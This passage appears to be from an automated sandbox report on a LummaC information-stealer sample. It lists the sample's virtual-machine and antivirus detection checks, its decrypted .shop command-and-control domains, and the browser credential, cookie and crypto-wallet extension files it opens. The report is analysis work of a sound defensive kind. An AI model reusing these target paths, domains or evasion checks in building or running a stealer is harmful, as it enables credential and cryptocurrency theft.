            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exe TID: 7036Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exe TID: 7032Thread sleep time: -30000s >= -30000sJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: VMware
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000301D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000301D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`)
            Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00435B70 LdrInitializeThunk,0_2_00435B70
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE092B mov eax, dword ptr fs:[00000030h]0_2_02EE092B
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE0D90 mov eax, dword ptr fs:[00000030h]0_2_02EE0D90
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02FA36F3 push dword ptr fs:[00000030h]0_2_02FA36F3

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: 5Dw2hTQmiB.exeString found in binary or memory: absentconvicsjawun.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: pushjellysingeywus.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: economicscreateojsu.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: entitlementappwo.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: exceptionwillapews.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: wifeplasterbakewis.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: mealplayerpreceodsju.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: bordersoarmanusjuw.shop
            Source: 5Dw2hTQmiB.exeString found in binary or memory: suitcaseacanehalk.shop
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000301D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: 5Dw2hTQmiB.exe PID: 6988, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "z": "Wallets/Electrum",
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -print.fp", "simple-storage.json", "window-state.json"],
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\com.liberty.jaxx\\IndexedDB",
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1856035021.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000003006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1856035021.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binancex
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1856035021.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: AWallets/EthereumAw
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1856035021.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: AWallets/CoinomiC:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000003006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1856035021.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: AC:\Users\user\AppData\Roaming\Ledger Live+
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
